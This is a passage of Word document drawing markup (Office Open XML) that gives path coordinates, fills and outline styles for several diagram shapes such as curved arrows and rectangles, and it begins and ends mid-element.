                                  <a:pt x="551179" y="188849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="684783" y="232156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="815339" y="276225"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="942085" y="321183"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064513" y="367411"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1181988" y="415036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1238757" y="439293"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1294002" y="463931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1347724" y="489076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1399939" y="514682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450212" y="540512"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1500904" y="568306"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1545731" y="594070"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1589626" y="620973"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1632177" y="648838"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1673859" y="677926"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1711340" y="706189"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1747556" y="735743"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1782890" y="767014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1814257" y="797879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1814496" y="798011"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1843404" y="829310"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1870202" y="861568"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1894712" y="894207"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1916251" y="926453"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1936396" y="960119"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1955801" y="997042"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1971728" y="1031761"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1997756" y="1101901"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2016987" y="1173479"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2017606" y="1176195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2017688" y="1176391"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2024574" y="1211607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2030818" y="1251464"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2030856" y="1251708"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2030958" y="1252360"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2038153" y="1327785"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2039852" y="1367154"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2040379" y="1407033"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2039749" y="1446529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2038002" y="1486022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2035302" y="1526921"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2031619" y="1567434"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2027174" y="1608328"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2021839" y="1649349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2015998" y="1690624"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2009266" y="1732026"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2002281" y="1773555"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1987093" y="1855474"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1969897" y="1941068"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1952625" y="2025142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1965071" y="2027682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1982342" y="1943608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1999233" y="1859534"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2014727" y="1775714"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2021839" y="1734058"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2028571" y="1692529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2034412" y="1651127"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2039747" y="1609852"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2044319" y="1568831"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2047875" y="1527937"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2050669" y="1487424"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2052447" y="1447038"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2053081" y="1407033"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2052581" y="1367774"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2052574" y="1367154"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2050972" y="1328967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2047964" y="1289812"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2043429" y="1249807"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2037485" y="1211607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2030095" y="1173479"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2020951" y="1136014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2010155" y="1098803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1997582" y="1062227"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1983104" y="1026160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1966722" y="990473"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1948306" y="955421"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1927859" y="921003"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1905127" y="886968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1880234" y="853694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1853056" y="821054"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1823465" y="789051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1791461" y="757682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1757045" y="727075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1720341" y="697102"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1681352" y="667765"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1640331" y="638937"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1597152" y="610743"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1552066" y="583184"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="556006"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1456181" y="529336"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1405635" y="503300"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1353311" y="477647"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1299336" y="452500"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1243964" y="427609"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1186941" y="403351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1069212" y="355600"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="946530" y="309245"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="819530" y="264160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="688848" y="220090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="554989" y="176784"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280797" y="91948"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74838" y="30448"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="1782890" y="767014"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1782752" y="767014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1784234" y="768331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1782890" y="767014"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="83947" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="14732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="62102" y="73025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="71198" y="42617"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="59054" y="38988"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="62610" y="26797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75931" y="26797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="83947" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="62610" y="26797"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="59054" y="38988"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="71198" y="42617"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74838" y="30448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="62610" y="26797"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="75931" y="26797"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="62610" y="26797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74838" y="30448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75931" y="26797"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="547" name="Graphic 547"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6350" y="2145796"/>
                            <a:ext cx="2931160" cy="737870"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2931160" h="737870">
                                <a:moveTo>
                                  <a:pt x="2930652" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="737615"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2930652" y="737615"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2930652" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="E7E6E6"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="548" name="Graphic 548"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6350" y="2145796"/>
                            <a:ext cx="2931160" cy="737870"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2931160" h="737870">
                                <a:moveTo>
                                  <a:pt x="0" y="737615"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2930652" y="737615"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2930652" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="737615"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="4471C4"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="549" name="Graphic 549"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4232402" y="3096772"/>
                            <a:ext cx="1960245" cy="1346200"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1960245" h="1346200">
                                <a:moveTo>
                                  <a:pt x="1014984" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="830580"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1014984" y="830580"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1014984" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1960245" h="1346200">
                                <a:moveTo>
                                  <a:pt x="1959864" y="883920"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="670560" y="883920"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="670560" y="1345692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1959864" y="1345692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1959864" y="883920"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="550" name="Graphic 550"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4902961" y="3980692"/>
                            <a:ext cx="1289685" cy="462280"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1289685" h="462280">
                                <a:moveTo>
                                  <a:pt x="0" y="461772"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1289303" y="461772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1289303" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="461772"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="4471C4"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="551" name="Graphic 551"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2831928" y="1722236"/>
                            <a:ext cx="2400935" cy="2288540"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2400935" h="2288540">
                                <a:moveTo>
                                  <a:pt x="1030522" y="965595"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1086639" y="912595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1142455" y="860610"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1197904" y="809687"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252921" y="759871"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1307441" y="711207"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1361398" y="663742"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1414728" y="617520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1467365" y="572589"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1519244" y="528992"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1570300" y="486777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1620467" y="445989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1669681" y="406674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1717875" y="368876"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1764986" y="332643"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1810947" y="298019"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1855694" y="265051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1899161" y="233784"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1941284" y="204264"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1981996" y="176537"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2021233" y="150647"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2058929" y="126642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2095020" y="104566"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2129439" y="84466"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2193005" y="50375"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2249104" y="24733"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2297216" y="7908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2336817" y="264"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2353264" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2367388" y="2167"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2399155" y="35569"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2400614" y="49786"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2399529" y="66201"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2389918" y="105377"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2370714" y="152593"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2342306" y="207347"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2305087" y="269134"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2283295" y="302509"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2259447" y="337454"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2233591" y="373905"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2205776" y="411801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2176051" y="451079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2144466" y="491674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2111068" y="533525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2075907" y="576569"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2039032" y="620743"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2000491" y="665984"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1960333" y="712228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1918607" y="759414"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1875363" y="807478"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1830648" y="856358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1784512" y="905990"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1737003" y="956312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1688171" y="1007260"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1638064" y="1058772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1586732" y="1110786"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1534222" y="1163237"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1480584" y="1216064"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1425867" y="1269203"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1370120" y="1322592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1314002" y="1375602"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1258186" y="1427597"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1202737" y="1478529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1147720" y="1528354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1093200" y="1577026"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1039243" y="1624499"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="985913" y="1670727"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="933276" y="1715665"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="881397" y="1759267"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="830341" y="1801487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="780174" y="1842279"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="730961" y="1881599"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="682766" y="1919399"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="635655" y="1955635"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="589694" y="1990260"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="544947" y="2023230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="501480" y="2054497"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="459357" y="2084018"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="418645" y="2111744"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="379408" y="2137633"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="341712" y="2161636"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="305622" y="2183709"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271202" y="2203806"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="207636" y="2237890"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="151537" y="2263520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="103426" y="2280333"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63824" y="2287961"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="47377" y="2288217"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33253" y="2286040"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1467" y="2252618"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2238403"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1078" y="2221989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="10678" y="2182819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29876" y="2135609"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58279" y="2080862"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="95498" y="2019081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="117290" y="1985710"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="141140" y="1950769"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="166997" y="1914321"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="194814" y="1876428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="224541" y="1837154"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="256129" y="1796561"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="289530" y="1754712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="324694" y="1711670"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="361573" y="1667498"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="400118" y="1622259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="440279" y="1576015"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="482008" y="1528829"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="525256" y="1480764"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="569975" y="1431883"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="616114" y="1382248"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="663626" y="1331924"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="712461" y="1280971"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="762570" y="1229454"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="813905" y="1177435"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="866417" y="1124977"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="920056" y="1072142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="974774" y="1018994"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1030522" y="965595"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="2E528F"/>
                            </a:solidFill>
                            <a:prstDash val="lgDashDot"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="552" name="Graphic 552"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2988817" y="2476250"/>
                            <a:ext cx="728345" cy="308610"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="728345" h="308610">
                                <a:moveTo>
                                  <a:pt x="651763" y="232410"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="651763" y="308610"/>
                                </a:lnTo>
